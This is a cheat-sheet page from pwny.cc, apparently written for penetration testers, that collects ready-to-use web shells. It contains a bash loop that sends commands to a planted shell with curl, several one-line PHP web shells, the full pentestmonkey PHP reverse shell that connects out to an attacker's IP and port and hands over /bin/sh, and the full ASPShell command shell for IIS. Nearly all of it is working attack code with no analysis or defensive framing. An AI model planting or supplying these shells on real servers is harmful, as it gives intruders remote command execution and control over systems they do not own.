pwny.cc
Search…
Web Shells

Simple bash script to handle basic webshell

1
#Save next onliner as cli.sh
2
while true;do read -p "[>] :~$ " cmd;curl $1$cmd;done
3
4
#Usage: ./cli.sh http://target.com/path/to/shell.php?0=
Copied!

PHP - Basic

1
#Simple Webshell - system
2
<?php echo system($_GET["cmd"]); ?>
3
4
#Simple Webshell - passthru
5
<?php echo passthru($_GET['cmd']); ?>
6
7
#Tiny Webshell
8
<?=`$_GET[0]`?>
Copied!

PHP - pentestmonkey php revshell

1
<?php
2
3
set_time_limit (0);
4
$VERSION = "1.0";
5
$ip = '127.0.0.1'; // CHANGE THIS <-----
6
$port = 1234; // CHANGE THIS <-----
7
$chunk_size = 1400;
8
$write_a = null;
9
$error_a = null;
10
$shell = 'uname -a; w; id; /bin/sh -i';
11
$daemon = 0;
12
$debug = 0;
13
14
if (function_exists('pcntl_fork')) {
15
$pid = pcntl_fork();
16
17
if ($pid == -1) {
18
printit("ERROR: Can't fork");
19
exit(1);
20
}
21
22
if ($pid) {
23
exit(0); // Parent exits
24
}
25
26
// Make the current process a session leader
27
// Will only succeed if we forked
28
if (posix_setsid() == -1) {
29
printit("Error: Can't setsid()");
30
exit(1);
31
}
32
33
$daemon = 1;
34
} else {
35
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
36
}
37
38
chdir("/");
39
40
umask(0);
41
42
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
43
if (!$sock) {
44
printit("$errstr ($errno)");
45
exit(1);
46
}
47
48
$descriptorspec = array(
49
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
50
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
51
2 => array("pipe", "w") // stderr is a pipe that the child will write to
52
);
53
54
$process = proc_open($shell, $descriptorspec, $pipes);
55
56
if (!is_resource($process)) {
57
printit("ERROR: Can't spawn shell");
58
exit(1);
59
}
60
61
stream_set_blocking($pipes[0], 0);
62
stream_set_blocking($pipes[1], 0);
63
stream_set_blocking($pipes[2], 0);
64
stream_set_blocking($sock, 0);
65
66
printit("Successfully opened reverse shell to $ip:$port");
67
68
while (1) {
69
if (feof($sock)) {
70
printit("ERROR: Shell connection terminated");
71
break;
72
}
73
74
if (feof($pipes[1])) {
75
printit("ERROR: Shell process terminated");
76
break;
77
}
78
79
$read_a = array($sock, $pipes[1], $pipes[2]);
80
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
81
82
if (in_array($sock, $read_a)) {
83
if ($debug) printit("SOCK READ");
84
$input = fread($sock, $chunk_size);
85
if ($debug) printit("SOCK: $input");
86
fwrite($pipes[0], $input);
87
}
88
89
90
if (in_array($pipes[1], $read_a)) {
91
if ($debug) printit("STDOUT READ");
92
$input = fread($pipes[1], $chunk_size);
93
if ($debug) printit("STDOUT: $input");
94
fwrite($sock, $input);
95
}
96
97
if (in_array($pipes[2], $read_a)) {
98
if ($debug) printit("STDERR READ");
99
$input = fread($pipes[2], $chunk_size);
100
if ($debug) printit("STDERR: $input");
101
fwrite($sock, $input);
102
}
103
}
104
105
fclose($sock);
106
fclose($pipes[0]);
107
fclose($pipes[1]);
108
fclose($pipes[2]);
109
proc_close($process);
110
111
function printit ($string) {
112
if (!$daemon) {
113
print "$string\n";
114
}
115
}
116
117
?>
Copied!

ASP.NET

1
<%@ Language = "JScript" %>
2
<%
3
/*
4
ASPShell - web based shell for Microsoft IIS
5
Copyright (C) 2007 Kurt Hanner
6
7
This program is free software; you can redistribute it and/or modify
8
it under the terms of the GNU General Public License as published by
9
the Free Software Foundation; either version 2 of the License, or
10
(at your option) any later version.
11
12
This program is distributed in the hope that it will be useful,
13
but WITHOUT ANY WARRANTY; without even the implied warranty of
14
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
15
GNU General Public License for more details.
16
17
You should have received a copy of the GNU General Public License
18
along with this program; if not, write to the Free Software
19
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
20
21
http://aspshell.sourceforge.net
22
*/
23
var version = "0.2 (beta) [2007-09-29]";
24
var homepagelink = "http://aspshell.sourceforge.net";
25
26
var q = Request("q")();
27
var cd = Request("cd")();
28
if (q)
29
{
30
var command = "";
31
var output = "";
32
if (q.length == 0)
33
{
34
q = ":";
35
}
36
command = "" + q;
37
if (command == "?")
38
{
39
output = " ? this help page\n" +
40
" :sv all server variables\n" +
41
" <shell command> execute any shell command\n";
42
}
43
else if (command.toLowerCase() == ":sv")
44
{
45
var sv = "";
46
var svvalue = "";
47
var esv = new Enumerator(Request.ServerVariables);
48
for (; !esv.atEnd(); esv.moveNext())
49
{
50
sv = esv.item();
51
output += sv;
52
output += ": ";
53
svvalue = "" + Request.ServerVariables(sv);
54
if (svvalue.indexOf("\n") >= 0)
55
{
56
output += "\n";
57
var svitems = svvalue.split("\n");
58
for (var i=0; i<svitems.length; i++)
59
{
60
if (svitems[i].length > 0)
61
{
62
output += " ";
63
output += svitems[i];
64
output += "\n";
65
}
66
}
67
}
68
else
69
{
70
output += svvalue;
71
output += "\n";
72
}
73
}
74
}
75
else if (command.toLowerCase() == ":cd")
76
{
77
var fso = new ActiveXObject("Scripting.FileSystemObject");
78
output = fso.GetAbsolutePathName(".");
79
}
80
else if (/^:checkdir\s(.*)?$/i.test(command))
81
{
82
var newdirabs = "";
83
var newdir = RegExp.$1;
84
var fso = new ActiveXObject("Scripting.FileSystemObject");
85
var cdnorm = fso.GetFolder(cd).Path;
86
if (/^\\/i.test(newdir))
87
{
88
newdirabs = fso.GetFolder(cd).Drive + newdir;
89
}
90
else if (/^\w:/i.test(newdir))
91
{
92
newdirabs = fso.GetAbsolutePathName(newdir);
93
}
94
else
95
{
96
newdirabs = fso.GetAbsolutePathName(fso.GetFolder(cd).Path + "\\" + newdir);
97
}
98
output = fso.FolderExists(newdirabs) ? newdirabs : "fail";
99
}
100
else
101
{
102
var changedir = "";
103
var currdrive = "";
104
var currpath = "";
105
var colonpos = cd.indexOf(":");
106
if (colonpos >= 0) {
107
currdrive = cd.substr(0, colonpos+1);
108
currpath = cd.substr(colonpos+1);
109
changedir = currdrive + " && cd \"" + currpath + "\" && ";
110
}
111
var shell = new ActiveXObject("WScript.Shell");
112
var pipe = shell.Exec("%comspec% /c \"" + changedir + command + "\"");
113
output = pipe.StdOut.ReadAll() + pipe.StdErr.ReadAll();
114
}
115
Response.Write(output);
116
}
117
else
118
{
119
var fso = new ActiveXObject("Scripting.FileSystemObject");
120
var currentpath = fso.GetAbsolutePathName(".");
121
var currentdrive = fso.GetDrive(fso.GetDriveName(currentpath));
122
var drivepath = currentdrive.Path;
123
%>
124
<html>
125
126
<head>
127
<meta HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
128
<style><!--
129
body {
130
background: #000000;
131
color: #CCCCCC;
132
font-family: courier new;
133
font-size: 10pt
134
}
135
input {
136
background: #000000;
137
color: #CCCCCC;
138
border: none;
139
font-family: courier new;
140
font-size: 10pt;
141
}
142
--></style>
143
144
<script language="JavaScript"><!--
145
146
var history = new Array();
147
var historypos = 0;
148
var currentdirectory = "";
149
var checkdirectory = "";
150
151
function ajax(url, vars, callbackFunction)
152
{
153
var request = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0");
154
request.open("POST", url, true);
155
request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
156
request.onreadystatechange = function()
157
{
158
if (request.readyState == 4 && request.status == 200)
159
{
160
if (request.responseText)
161
{
162
callbackFunction(request.responseText);
163
}
164
}
165
}
166
request.send(vars);
167
}
168
169
function FormatOutput(txt)
170
{
171
return txt.replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/\x20/g, "&nbsp;").replace(/\t/g, "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;").replace(/\n/g, "<br/>");
172
}
173
174
function KeyDownEventHandler(ev)
175
{
176
document.all("q").focus();
177
if (!ev)
178
{
179
ev = window.event;
180
}
181
if (ev.which)
182
{
183
keycode = ev.which;
184
}
185
else if (ev.keyCode)
186
{
187
keycode = ev.keyCode;
188
}
189
if (keycode == 13)
190
{
191
var cmd = document.all("q").value;
192
outputAvailable("[" + currentdirectory + "] " + cmd);
193
if (/cd\s+(\"?)(.*)?\1\s*$/i.test(cmd))
194
{
195
checkdirectory = RegExp.$2;
196
ajax(document.URL, "q=" + encodeURIComponent(":checkdir " + RegExp.$2) + "&cd=" + encodeURIComponent(currentdirectory), checkdirAvailable);
197
history[history.length] = cmd;
198
historypos = history.length;
199
}
200
else if (cmd.length > 0)
201
{
202
ajax(document.URL, "q=" + encodeURIComponent(cmd) + "&cd=" + encodeURIComponent(currentdirectory), outputAvailable);
203
history[history.length] = cmd;
204
historypos = history.length;
205
}
206
}
207
else if (keycode == 38 && historypos > 0)
208
{
209
historypos--;
210
document.all("q").value = history[historypos];
211
}
212
else if (keycode == 40 && historypos < history.length)
213
{
214
historypos++;
215
if (historypos == history.length)
216
{
217
document.all("q").value = "";
218
}
219
else {
220
document.all("q").value = history[historypos];
221
}
222
}
223
}
224
225
function outputAvailable(output)
226
{
227
var newelem = document.createElement("DIV");
228
newelem.innerHTML = FormatOutput(output);
229
document.all("output").appendChild(newelem);
230
var oldYPos = 0, newYPos = 0;
231
var scroll = true;
232
do
233
{
234
if (document.all)
235
{
236
oldYPos = document.body.scrollTop;
237
}
238
else
239
{
240
oldYPos = window.pageYOffset;
241
}
242
window.scrollBy(0, 100);
243
if (document.all)
244
{
245
newYPos = document.body.scrollTop;
246
}
247
else
248
{
249
newYPos = window.pageYOffset;
250
}
251
} while (oldYPos < newYPos);
252
document.all("q").value = "";
253
}
254
255
function checkdirAvailable(output)
256
{
257
if (output.toLowerCase() == "fail")
258
{
259
outputAvailable("The system cannot find the path specified.");
260
}
261
else {
262
SetCurrentDirectory(output);
263
}
264
}
265
266
function SetCurrentDirectory(output)
267
{
268
currentdirectory = output;
269
document.all("prompt").innerHTML = "[" + output + "]";
270
}
271
272
function GetCurrentDirectory()
273
{
274
ajax(document.URL, "q=" + encodeURIComponent(":cd"), SetCurrentDirectory);
275
}
276
277
function InitPage()
278
{
279
document.all("q").focus();
280
document.onkeydown = KeyDownEventHandler;
281
GetCurrentDirectory();
282
}
283
//--></script>
284
285
<title id=titletext>Web Shell</title>
286
</head>
287
288
<body onload="InitPage()">
289
290
<div id="output">
291
<div id="greeting">
292
ASPShell - Web-based Shell Environment Version <%=version%><br/>
293
Copyright (c) 2007 Kurt Hanner, <a href="<%=homepagelink%>"><%=homepagelink%></a><br/><br/>
294
</div>
295
</div>
296
297
<label id="prompt">[undefined]</label>
298
<input type="text" name="q" maxlength=1024 size=72>
299
300
</body>
301
</html>
302
<%
303
}
304
%>
Copied!